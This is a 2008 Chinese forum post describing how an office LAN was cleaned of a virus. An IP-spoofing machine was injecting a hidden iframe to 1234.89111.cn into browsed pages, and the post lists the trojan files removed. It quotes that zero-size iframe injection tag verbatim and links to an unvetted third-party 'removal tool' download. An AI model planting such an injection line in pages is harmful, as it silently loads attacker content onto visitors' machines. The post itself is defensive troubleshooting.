1234.89111.cn病毒木马解决办法及专杀工具下载

PHP研究人员 · 发表于 2008-4-14 01:12:13

昨天开始发现公司内部局域网出现网速大幅度下降，同时程序员在访问网页的过程中页面被加载 <iframe src=http://1234.89111.cn/woyao.htm width=0 height=0></iframe> 也就是说这本机访问网页都间接的为这个垃圾<NOBR oncontextmenu="return false;" onmousemove=kwM(6); id=key5 onmouseover="kwE(event,6, this);" style="COLOR: #6600ff; BORDER-BOTTOM: 0px dotted; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" onclick="return kwC();" onmouseout="kwL(event, this);" target="_blank">网站刷流量了，非常不爽。同时局域网中不少电脑都开始表现相同症状。
<IMG onmousewheel="return img_zoom(event,this)" src="http://www.mynbw.com/bbs/UpFile/UpAttachment/2007-6/2007612103139.jpg" DrawImage="(this)">
上ALEXA对比察看，发现这个现象是最近两天才出现的激增现象。所以说这个网站绝对就是病源，目的在于刷流量，做暴发户。
昨天下午开始，对局域网开始断网<NOBR oncontextmenu="return false;" onmousemove=kwM(0); id=key0 onmouseover="kwE(event,0, this);" style="COLOR: #6600ff; BORDER-BOTTOM: 0px dotted; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" onclick="return kwC();" onmouseout="kwL(event, this);" target="_blank">杀毒处理。奇怪的现象出现了，一旦断网，不少计算机访问本地页面不会加载这个iframe~~难道是说这个病毒在局域网某台机伪装成服务器了？
断网杀毒完成后，发现问题还是没有解决，一旦<NOBR oncontextmenu="return false;" onmousemove=kwM(1); id=key1 onmouseover="kwE(event,1, this);" style="COLOR: #6600ff; BORDER-BOTTOM: #6600ff 1px dotted; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" onclick="return kwC();" onmouseout="kwL(event, this);" target="_blank">网络重新打开问题依旧。可以说杀毒软件都是最新的，只能是说没有办法应对这个病毒，没有根除病源。木马倒是扫了几个
后来依次连通网络，发现了一个症状，其中某一台计算机在不断的IP克隆，也就是说他的IP不断的在路由器上改变，在路由上能够发现它是一分钟左右伪造成局域网中某一台正常使用的电脑的IP。你会发现路由器里面会存在两个相同的IP，不同的MAC地址。有了以上分析就好办了
<IMG onmousewheel="return img_zoom(event,this)" src="http://www.mynbw.com/bbs/UpFile/UpAttachment/2007-6/200761211827.jpg" DrawImage="(this)">
症状排除：
1、将不断复制IP地址的计算机隔离后，局域网内所有计算机表象正常，不再加载iframe
2、由于杀毒软件是通过<NOBR oncontextmenu="return false;" onmousemove=kwM(2); id=key2 onmouseover="kwE(event,2, this);" style="COLOR: #6600ff; BORDER-BOTTOM: #6600ff 1px dotted; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" onclick="return kwC();" onmouseout="kwL(event, this);" target="_blank">代码相似匹配病毒，而该病毒属于新型病毒无法杀灭，所以找了一款主动防御软件。监视不良程序的异常举动，这里由于个人喜好，选择的是东方微点Miropoint。大家可以上baidu去搜索一下东方微点这个名词。
3、对存在病源的电脑进行安装后，开机重启发现<NOBR oncontextmenu="return false;" onmousemove=kwM(4); id=key4 onmouseover="kwE(event,4, this);" style="COLOR: #6600ff; BORDER-BOTTOM: #6600ff 1px dotted; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" onclick="return kwC();" onmouseout="kwL(event, this);" target="_blank">病毒USBINTE.SYS看来这个东西伪装成了USB驱动，接着又出现了VISIN.EXE这个木马，确认删除后出现计算机黑屏重启。（冒汗~~不会是当了吧）
<IMG onmousewheel="return img_zoom(event,this)" src="http://www.mynbw.com/bbs/UpFile/UpAttachment/2007-6/2007612104436.jpg" DrawImage="(this)">
 4、重启后发现没什么问题，看来只是寻常的木马问题。打开IE这下才开始真正的元凶，SYSTEM64为前缀的所有文件都是放在PLUGINS里面，显然不是好东西。作怪的就是这些文件，还需要重新启动才能完成杀毒。
5、由于通过移动硬盘安装，移动硬盘插入这台机器的时候便被感染了CMD.EXE这垃圾小程序，删除还是简单的，这是这个病毒附带的<NOBR oncontextmenu="return false;" onmousemove=kwM(7); id=key6 onmouseover="kwE(event,7, this);" style="COLOR: #6600ff; BORDER-BOTTOM: #6600ff 1px dotted; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" onclick="return kwC();" onmouseout="kwL(event, this);" target="_blank">礼品。
到此为止病毒的侵略结束，所有计算机联网都正常，网络恢复原样。
 
总结一下：局域网内的计算机一定要做必要的防护，哪怕是一个过期的杀毒软件也能撑一下门面。对于这一类一机中毒，全网受害的案例，必须要一个个的查病灶。病毒的机理，还是通过用户访问网页时下载，本机后台隐藏运行。
建议大家尽量安装预防性的主动防御软件，杀毒软件只是对已经中毒的电脑进行清理。防御软件，是对潜在的病毒进行抵御。以上仅为一家之言，<NOBR oncontextmenu="return false;" onmousemove=kwM(3); id=key3 onmouseover="kwE(event,3, this);" style="COLOR: #6600ff; BORDER-BOTTOM: #6600ff 1px dotted; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" onclick="return kwC();" onmouseout="kwL(event, this);" target="_blank">希望能对大家有些帮助。
1234.89111.cn病毒专杀工具下载地址：<A href="http://www.hotbus.cn/it/200706/2114.html">/it/200706/2114.html</A>

账号		自动登录	找回密码
密码			注册账户

1234.89111.cn病毒木马解决办法及专杀工具下载

相关帖子